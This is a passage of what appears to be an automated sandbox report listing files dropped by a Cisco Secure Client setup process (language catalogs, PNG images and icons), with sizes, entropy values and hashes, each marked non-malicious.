                                                                                                                                                                                                  SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388375
                                                                                                                                                                                                  Entropy (8bit):5.9662824242248815
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                                                                                  MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                                                                                  SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                                                                                  SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                                                                                  SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):357929
                                                                                                                                                                                                  Entropy (8bit):6.014691052026819
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                                                                                  MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                                                                                  SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                                                                                  SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                                                                                  SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347088
                                                                                                                                                                                                  Entropy (8bit):5.137429334753401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                                                                                  MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                                                                                  SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                                                                                  SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                                                                                  SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):352370
                                                                                                                                                                                                  Entropy (8bit):5.387002164805478
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                                                                                  MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                                                                                  SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                                                                                  SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                                                                                  SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347902
                                                                                                                                                                                                  Entropy (8bit):5.1986177425205575
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                                                                                  MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                                                                                  SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                                                                                  SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                                                                                  SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):467531
                                                                                                                                                                                                  Entropy (8bit):5.410391422981112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                                                                                  MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                                                                                  SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                                                                                  SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                                                                                  SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312691
                                                                                                                                                                                                  Entropy (8bit):6.238069670792444
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                                                                                  SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                                                                                  SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                                                                                  SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312693
                                                                                                                                                                                                  Entropy (8bit):6.237794032422467
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                                                                                  SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                                                                                  SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                                                                                  SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313019
                                                                                                                                                                                                  Entropy (8bit):6.234654802477353
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                                                                                  MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                                                                                  SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                                                                                  SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                                                                                  SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):313017
                                                                                                                                                                                                  Entropy (8bit):6.23496399047262
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKSWLVBKfKh+nOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hD1fe0akxNF
                                                                                                                                                                                                  MD5:CEB6BC2F926118460165347F8EA04C76
                                                                                                                                                                                                  SHA1:E188B65EA47E9C347541752DAB4D2EF055216621
                                                                                                                                                                                                  SHA-256:A6A7AA156EC2FCC564E0D475F02243AFEEF09028FF1F3840D4C73C4064BFFC20
                                                                                                                                                                                                  SHA-512:6D49DB3F01DE644C4EA1A4D8120A9D0506B9200542E272626A05E03EF03EFDB1DEB3F7865E3919204DDD2F8690C5C5700B9F15208B81303581CAC523C07099A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3882
                                                                                                                                                                                                  Entropy (8bit):6.743390042757195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                                                                                  MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                                                                                  SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                                                                                  SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                                                                                  SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3884
                                                                                                                                                                                                  Entropy (8bit):6.749338244156901
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3880
                                                                                                                                                                                                  Entropy (8bit):6.742220289284142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3881
                                                                                                                                                                                                  Entropy (8bit):6.749191813135782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):431993
                                                                                                                                                                                                  Entropy (8bit):4.565786626694248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1807
                                                                                                                                                                                                  Entropy (8bit):7.846793911413473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388
                                                                                                                                                                                                  Entropy (8bit):7.139959170245274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1916
                                                                                                                                                                                                  Entropy (8bit):7.856747119568193
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):421
                                                                                                                                                                                                  Entropy (8bit):7.268682924293009
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12558
                                                                                                                                                                                                  Entropy (8bit):7.968059020803266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                                                                                  MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                                                                                  SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                                                                                  SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                                                                                  SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                  Entropy (8bit):7.914852791051157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                                                                                  MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                                                                                  SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                                                                                  SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                                                                                  SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51094
                                                                                                                                                                                                  Entropy (8bit):7.977081753425093
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                                                                                  MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                                                                                  SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                                                                                  SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                                                                                  SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.7071518309363354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                                                                                  MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                                                                                  SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                                                                                  SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                                                                                  SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83111
                                                                                                                                                                                                  Entropy (8bit):7.138058183615623
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                                                                                  MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                                                                                  SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                                                                                  SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                                                                                  SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76349
                                                                                                                                                                                                  Entropy (8bit):6.476357962983417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                                                                                  MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                                                                                  SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                                                                                  SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                                                                                  SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83426
                                                                                                                                                                                                  Entropy (8bit):7.358868361468608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                                                                                  MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                                                                                  SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                                                                                  SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                                                                                  SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16443
                                                                                                                                                                                                  Entropy (8bit):7.760065707691873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                                                                                  MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                                                                                  SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                                                                                  SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                                                                                  SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0422788649872297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                                                                                  MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                                                                                  SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                                                                                  SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                                                                                  SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75452
                                                                                                                                                                                                  Entropy (8bit):6.447447333863436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                                                                                  MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                                                                                  SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                                                                                  SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                                                                                  SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76615
                                                                                                                                                                                                  Entropy (8bit):6.470162664157233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                                                                                  MD5:BCB76C77C4A705631EAECEAD63D6A8EF
